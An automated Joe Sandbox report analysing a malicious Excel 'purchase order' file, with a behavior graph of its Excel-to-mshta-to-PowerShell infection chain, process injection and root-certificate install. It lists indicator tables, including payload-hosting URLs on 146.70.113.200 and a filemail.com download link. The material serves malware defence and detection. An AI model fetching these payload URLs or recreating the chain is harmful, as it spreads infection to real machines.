              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Install Root Certificate              		Cached Domain Credentials1
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync14
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1566415 Sample: PO#BBGR2411PO69.xls Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 97 Suricata IDS alerts for network traffic 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 Multi AV Scanner detection for submitted file 2->101 103 13 other signatures 2->103 11 EXCEL.EXE 59 32 2->11         started        process3 dnsIp4 75 146.70.113.200, 49162, 49164, 49165 TENET-1ZA United Kingdom 11->75 77 linkjago.me 188.114.96.6, 443, 49161, 49166 CLOUDFLARENETUS European Union 11->77 65 C:\Users\user\...\PO#BBGR2411PO69.xls (copy), Composite 11->65 dropped 67 C:\...\seemebestthingsgivenmegood[1].hta, HTML 11->67 dropped 117 Microsoft Office drops suspicious files 11->117 16 mshta.exe 10 11->16         started        20 mshta.exe 10 11->20         started        file5 signatures6 process7 dnsIp8 69 188.114.97.6, 443, 49163 CLOUDFLARENETUS European Union 16->69 71 linkjago.me 16->71 85 Suspicious command line found 16->85 87 PowerShell case anomaly found 16->87 22 cmd.exe 16->22         started        73 linkjago.me 20->73 25 cmd.exe 20->25         started        signatures9 process10 signatures11 105 Suspicious powershell command line found 22->105 107 Wscript starts Powershell (via cmd or directly) 22->107 109 PowerShell case anomaly found 22->109 27 powershell.exe 24 22->27         started        31 powershell.exe 25->31         started        process12 file13 61 C:\...\seethebestmagicalthignsgivegoodfo.vbS, Unicode 27->61 dropped 63 C:\Users\user\AppData\...\r3q12jmu.cmdline, Unicode 27->63 dropped 111 Installs new ROOT certificates 27->111 33 wscript.exe 1 27->33         started        36 csc.exe 2 27->36         started        39 wscript.exe 31->39         started        41 csc.exe 2 31->41         started        signatures14 process15 file16 89 Suspicious powershell command line found 33->89 91 Wscript starts Powershell (via cmd or directly) 33->91 93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 33->93 95 Suspicious execution chain found 33->95 43 powershell.exe 12 4 33->43         started        57 C:\Users\user\AppData\Local\...\r3q12jmu.dll, PE32 36->57 dropped 47 cvtres.exe 36->47         started        49 powershell.exe 39->49         started        59 C:\Users\user\AppData\Local\...\xmqw35tj.dll, PE32 41->59 dropped 51 cvtres.exe 41->51         started        signatures17 process18 dnsIp19 79 ip.1016.filemail.com 142.215.209.77, 443, 49167, 49172 HUMBER-COLLEGECA Canada 43->79 81 1016.filemail.com 43->81 113 Writes to foreign memory regions 43->113 115 Injects a PE file into a foreign processes 43->115 53 aspnet_compiler.exe 43->53         started        83 1016.filemail.com 49->83 55 aspnet_compiler.exe 49->55         started        signatures20 process21

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              PO#BBGR2411PO69.xls11%ReversingLabs
              PO#BBGR2411PO69.xls8%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              linkjago.me0%VirustotalBrowse
              ip.1016.filemail.com0%VirustotalBrowse
              1016.filemail.com0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta0%Avira URL Cloudsafe
              https://linkjago.me/S0%Avira URL Cloudsafe
              http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp0%Avira URL Cloudsafe
              http://146.70.113.200/231/seethe0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlig0%Avira URL Cloudsafe
              http://146.70.113.200/0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJ0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaes0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligM0%Avira URL Cloudsafe
              https://1016.filemail.com0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-F0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaX0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&span0%Avira URL Cloudsafe
              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5T0%Avira URL Cloudsafe
              http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFp0%VirustotalBrowse
              http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIF0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebestt0%Avira URL Cloudsafe
              https://linkjago.me/v0%Avira URL Cloudsafe
              https://linkjago.me/r0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:0%Avira URL Cloudsafe
              http://146.70.113.200/231/seethe0%VirustotalBrowse
              https://linkjago.me/0%Avira URL Cloudsafe
              http://146.70.113.200//0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta240%Avira URL Cloudsafe
              https://linkjago.me/H0%Avira URL Cloudsafe
              http://146.70.113.200/231/ZAHHRZA.txt0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC0%Avira URL Cloudsafe
              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c0%Avira URL Cloudsafe
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl00%Avira URL Cloudsafe
              https://linkjago.me/L0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              linkjago.me
              		188.114.96.6
              		truefalseunknown
              ip.1016.filemail.com
              		142.215.209.77
              		truetrueunknown
              1016.filemail.com
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htatrue
              • Avira URL Cloud: safe
              		unknown
              http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFtrue
              • Avira URL Cloud: safe
              		unknown
              http://146.70.113.200/231/ZAHHRZA.txttrue
              • Avira URL Cloud: safe
              		unknown
              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6ctrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://146.70.113.200/231/seethebestmagicalthignsgivegoodforu.tIFppowershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middlmshta.exe, 00000004.00000002.428991185.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423819561.000000000027A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://146.70.113.200/231/seethepowershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://linkjago.me/Smshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://146.70.113.200/mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligmshta.exe, 00000004.00000003.422140818.0000000000246000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.422140818.0000000000234000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.entrust.net03mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaJmshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaesmshta.exe, 00000004.00000002.428991185.0000000000215000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003BE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...mshta.exe, 0000000F.00000003.476457131.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghligMmshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta...893F-Fmshta.exe, 00000004.00000003.422140818.000000000027A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://1016.filemail.compowershell.exe, 0000000D.00000002.507185245.00000000022C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta$mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaXmshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://go.microspowershell.exe, 00000008.00000002.448366945.0000000002BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaghlight=delicious&middleman=magenta&spanmshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://1016.filemail.com/api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tpowershell.exe, 00000019.00000002.539807385.0000000002391000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htahttp://146.70.113.200/231/dnv/seemebesttmshta.exe, 00000004.00000003.424465133.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477594766.0000000002BB5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://linkjago.me/vmshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://linkjago.me/rmshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaC:mshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.000000000036E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://linkjago.me/mshta.exe, 00000004.00000003.421980549.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423720169.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.476457131.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.0000000000417000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.0000000000417000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://146.70.113.200//mshta.exe, 0000000F.00000003.473697893.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477245405.0000000003CB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003CB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477913163.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/powershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.450539995.0000000012321000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta24mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://linkjago.me/Hmshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaCmshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.448366945.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.507185245.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.485237811.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.539807385.0000000002191000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C310000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.htaght=delicious&middl0mshta.exe, 0000000F.00000003.476457131.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477656295.00000000003D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477431887.00000000003D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.423720169.0000000003912000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421980549.0000000003911000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.421365979.000000000390F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429172871.0000000003914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423391796.0000000003912000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.451041911.000000001C37C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477104853.0000000003C53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.477266779.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.473697893.0000000003C55000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.477862847.0000000003C57000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://go.crpowershell.exe, 00000013.00000002.490602752.000000001C251000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://linkjago.me/Lmshta.exe, 00000004.00000002.429165944.00000000038F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              142.215.209.77
                                              		ip.1016.filemail.comCanada
                                              		32156HUMBER-COLLEGECAtrue
                                              188.114.96.6
                                              		linkjago.meEuropean Union
                                              		13335CLOUDFLARENETUSfalse
                                              188.114.97.6
                                              		unknownEuropean Union
                                              		13335CLOUDFLARENETUSfalse
                                              146.70.113.200
                                              		unknownUnited Kingdom
                                              		2018TENET-1ZAtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1566415
                                              Start date and time:2024-12-02 07:23:13 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 52s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:31
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
